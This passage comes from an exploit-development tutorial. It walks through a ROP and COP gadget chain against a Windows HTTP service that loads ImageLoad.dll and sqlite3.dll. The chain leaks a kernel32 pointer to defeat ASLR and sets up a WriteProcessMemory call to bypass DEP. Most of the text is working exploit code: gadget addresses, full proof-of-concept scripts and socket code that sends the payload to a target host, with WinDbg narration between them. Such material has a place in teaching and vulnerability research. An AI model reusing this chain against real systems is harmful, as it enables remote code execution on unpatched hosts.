crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
It should also be noted that after each of these ROP gadgets is executed - the AL register will
be increased by 0x39. We will compensate for this in the future. Since AL only makes up
the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we
are trying to accomplish.
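A short Python sketch shows why the add al, 0x39 side effect stays contained: the addition wraps inside the low byte and never carries into the rest of EAX. The starting EAX value and the add_al helper are hypothetical.

```python
def add_al(eax, imm8):
    """Emulate 'add al, imm8': only the low byte of EAX changes."""
    al = (eax + imm8) & 0xFF
    return (eax & 0xFFFFFF00) | al


start = 0x028269F0            # hypothetical value of EAX before the gadgets
eax = start
for _ in range(12):           # twelve inc ecx ; add al, 0x39 ; ret gadgets
    eax = add_al(eax, 0x39)

print(hex(start), hex(eax))
```

However many times the gadget runs, EAX can drift by at most 0xFF from its original value, so it still points near the same region of the stack.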
ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter
placeholder.
A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with
the legitimate parameter.
The state of the parameters before the overwrite occurs can be seen below.
As we can see, the junk 0x22222222 parameter will be the target for the overwrite.
Stepping through the instruction, we have dynamically changed the parameter placeholder
for nSize to the legitimate parameter!
kernel32!WriteProcessMemory
Perfect! All that is left now is to extract our current pointer to kernel32.dll and calculate the
offset between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory. After
this, we will use the same primitive of dynamically manipulating
the kernel32!WriteProcessMemory parameter placeholder to point to the actual API.
Currently, ECX (the register we have been leveraging for each of the arbitrary writes to
overwrite function parameter placeholders) is 0x14 (20 decimal) bytes away from
the kernel32!WriteProcessMemory parameter placeholder.
Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
Once the ROP gadgets have executed, ECX now contains the same address as the parameter
placeholder for kernel32!WriteProcessMemory.
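Repeating the same gadget 0x14 times by hand is easy to miscount. A minimal sketch of a helper that builds the same bytes is shown here. The name repeat_gadget is an assumption introduced for illustration; the gadget address is the dec ecx ; ret gadget listed above.

```python
import struct

DEC_ECX = 0x61c27d1b  # dec ecx ; ret: sqlite3.dll (address taken from the notes)


def repeat_gadget(address, count):
    """Return `count` copies of a little-endian 32-bit gadget address."""
    return struct.pack('<L', address) * count


# Equivalent to writing the `dec ecx ; ret` line 0x14 (20) times.
dec_chain = repeat_gadget(DEC_ECX, 0x14)
print(len(dec_chain))
```

The result can be appended to the chain with crash += dec_chain, which keeps the intended count visible in one place.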
Since ECX is reserved for the arbitrary write, we will use EAX to also store
the kernel32!WriteProcessMemory parameter placeholder.
Recall that EDX still contains a value of 0x180, from the nSize parameter, since we have not
manipulated EDX since then. The current distance between the address within EAX
and the kernel32!WriteProcessMemory parameter placeholder is 0x260.
Since we already have a COP gadget that increases EDX by 0x20 bytes per execution, we
can reuse it to increase EDX by another 0xe0 bytes (seven executions), which gives
0x180 + 0xe0 = 0x260. Once EDX contains the value of 0x260, we can subtract it from EAX and place
the difference in EAX. This will allow us to store the address of the kernel32!WriteProcessMemory
parameter placeholder in EAX. This time, however, since EDI already contains the old “return to the
stack” routine, we can add to EDX directly.
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
After the add edx COP gadgets execute, EDX contains the distance between
the kernel32!WriteProcessMemory parameter placeholder and EAX (which is 0x260).
After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in
EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.
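The number of add edx, 0x20 executions needed here can be checked with a little arithmetic. The sketch below is only an illustration (the helper name gadget_count is an assumption). It uses the 0x180 starting value and the 0x260 target from the text, and the result matches the seven COP gadgets that the full PoC later in these notes issues at this point.

```python
def gadget_count(current, target, step):
    """How many `add reg, step` executions move `current` up to `target`."""
    diff = target - current
    if diff < 0 or diff % step != 0:
        raise ValueError("target is not reachable in whole steps")
    return diff // step


# EDX holds 0x180 (nSize) and must reach 0x260 in increments of 0x20.
needed = gadget_count(0x180, 0x260, 0x20)
print(needed)
```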
So currently, as it stands, the stack address of 0x2636920, which changes when the process
restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we
have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will
dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the
exact same routine, we will dereference 0x61c832e4 (which is a pointer
to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with
two ROP gadgets.
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX
(0x61c832e4).
Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX -
dynamically!
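The double dereference can be modeled with a small dictionary standing in for process memory. This is only a sketch. The two addresses 0x2636920 and 0x61c832e4 come from the text above, while the kernel32 address is a made-up value, since the real one changes with ASLR.

```python
# Toy memory model: address -> dword stored at that address.
memory = {
    0x02636920: 0x61c832e4,  # stack placeholder -> IAT entry (values from the notes)
    0x61c832e4: 0x76a01234,  # IAT entry -> kernel32 function (hypothetical address)
}


def mov_eax_deref(eax):
    """Model `mov eax, dword [eax] ; ret`."""
    return memory[eax]


eax = 0x02636920
eax = mov_eax_deref(eax)  # first gadget: EAX = 0x61c832e4
eax = mov_eax_deref(eax)  # second gadget: EAX = pointer into kernel32.dll
print(hex(eax))
```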
This is great news. We have defeated ASLR on the system itself. What needs to happen now is
that we need to find the offset
between kernel32!WriteProcessMemory and kernel32!WriteFileImplementation. To do this, we
can use WinDbg.
Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes -
we use the negative distance).
Instead of fighting with two’s complement math - let’s just use a different function from the
IAT. Preferably, let’s find a function whose virtual address is lower than that
of kernel32!WriteProcessMemory.
Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points
to kernel32!GetStartupInfoA.
Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired
output!
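To see why the negative distance works, here is a small sketch of the 32-bit arithmetic involved. The base address used for kernel32!GetStartupInfoA is hypothetical, and the helper names sub32 and neg32 are assumptions for illustration. Only the 0xfffffd2d offset comes from the text.

```python
import struct

MASK = 0xFFFFFFFF


def sub32(a, b):
    """Model a 32-bit `sub`: the result wraps modulo 2**32."""
    return (a - b) & MASK


def neg32(x):
    """Two's complement negation of a 32-bit value."""
    return (-x) & MASK


offset = 0xfffffd2d            # negative distance from the notes
forward = neg32(offset)        # the same distance as a positive number
startup_info = 0x76a01000      # hypothetical address of GetStartupInfoA

# Subtracting the negative distance is the same as adding the positive one.
target = sub32(startup_info, offset)
print(hex(forward), hex(target))

# The positive distance packs with NULL bytes, the negative one does not.
print(b'\x00' in struct.pack('<L', forward), b'\x00' in struct.pack('<L', offset))
```

This is the reason the chain subtracts 0xfffffd2d from EAX rather than adding the small positive distance directly.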
Now that we have solved this issue, let’s show the full PoC up until this point.
import sys
import os
import socket
import struct
# 4063 byte SEH offset
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
# loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
# placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
# gadget which moves EBP into ESP via "leave")
crash += struct.pack('<L', 0x1001283e) # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
# eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
# compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
# down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
# to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebp in leave instruction)
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at
# an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before
# shellcode)
crash += struct.pack('<L', 0x1001fce9) # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44) # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x10022f45) # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001c31e) # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate
# offset from kernel32!GetStartupInfoA
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by
# 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of
# ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
# EDI still contains return to stack ROP gadget for COP gadget compensation
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884) # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c) # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
# 4063 total offset to SEH
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()
Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.
crash += struct.pack('<L', 0x10022c4c) # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10022c1e) # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10015ce5) # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090) # Compensation for retn 0x10 in previous ROP gadget
4. Subtract the offset held in EDX from EAX - placing the result in EAX
The negative distance between the two kernel32.dll pointers is loaded into EBX.
The distance is then loaded into EDX.
Program execution then reaches the sub eax, edx instruction.
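The four 0x90909090 dwords placed after the sub eax, edx gadget exist because of the retn 0x10 in the previous gadget. The sketch below models only that retn 0x10 behavior on a toy stack. The helper name retn is an assumption, and the final dword is simply the dec ecx gadget used as a stand-in for whatever follows in the chain.

```python
def retn(stack, esp, imm):
    """Model `retn imm`: pop the return address, then discard `imm` more bytes.

    `stack` is a list of dwords and `esp` is a byte offset into it.
    """
    target = stack[esp // 4]
    esp += 4 + imm
    return target, esp


stack = [
    0x10015ce5,  # sub eax, edx ; ret  (return address taken by retn 0x10)
    0x90909090,  # skipped by retn 0x10
    0x90909090,  # skipped by retn 0x10
    0x90909090,  # skipped by retn 0x10
    0x90909090,  # skipped by retn 0x10
    0x61c27d1b,  # next gadget, reached by the `ret` of sub eax, edx
]

target, esp = retn(stack, 0, 0x10)
next_gadget = stack[esp // 4]
print(hex(target), hex(next_gadget))
```

Execution first goes to the sub eax, edx gadget, and only its own ret lands on the dword after the padding.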
If you recall, we already decremented ECX to make it contain the address of the parameter
placeholder. However, the ROP gadget we will use for our arbitrary write writes to ECX at
an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when
the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b) # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x10021bfb) # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)
Program execution reaches the arbitrary write - and we can see we will be overwriting our
parameter placeholder - as intended.
The arbitrary write occurs, and we have successfully dynamically placed our parameters on the
stack!
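The compensation for the +0x8 offset can be sketched with a toy memory model. The placeholder address reuses the 0x2636920 stack address mentioned earlier, which changes between runs. The resolved API address and the helper name are hypothetical.

```python
def mov_ecx8_eax(memory, ecx, eax):
    """Model `mov dword [ecx+0x8], eax ; ret`."""
    memory[ecx + 0x8] = eax


placeholder = 0x02636920        # stack slot to overwrite (varies per run)
resolved_api = 0x76a012d3       # hypothetical kernel32!WriteProcessMemory address
memory = {placeholder: 0x61c832e4}

# ECX is moved 0x8 bytes below the placeholder so that [ecx+0x8] hits it exactly.
ecx = placeholder - 0x8
mov_ecx8_eax(memory, ecx, resolved_api)
print(hex(memory[placeholder]))
```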
Now that everything has been configured properly, the final goal is to kick off this function call.
To do so, we will need to load the stack address which points
to kernel32!WriteProcessMemory into ESP - and return into it.
Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack
address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary
write ROP gadget). This means we want to increase ECX to contain the address on the stack in
question.
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081) # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001fa0d) # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c07ff8) # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)
Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP
gadget.
# Breakpoints
Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is
complete - and that we have hit our breakpoints!
import sys
import os
import socket
import struct
# Saving address near ESP for relative calculations into EAX and ECX
crash += struct.pack('<L', 0x61c05e8c) # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)
# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for
# loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be
# placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP
# gadget which moves EBP into ESP via "leave")
crash += struct.pack('<L', 0x1001283e) # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)
# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov
# eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget
# compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping"
# down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX
# to be "values around the stack"
crash += struct.pack('<L', 0x61c30547) # add ebp, eax ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d) # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090) # Padding to compensate for above ROP gadget (pop ebp in leave instruction)
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at
# an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc) # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
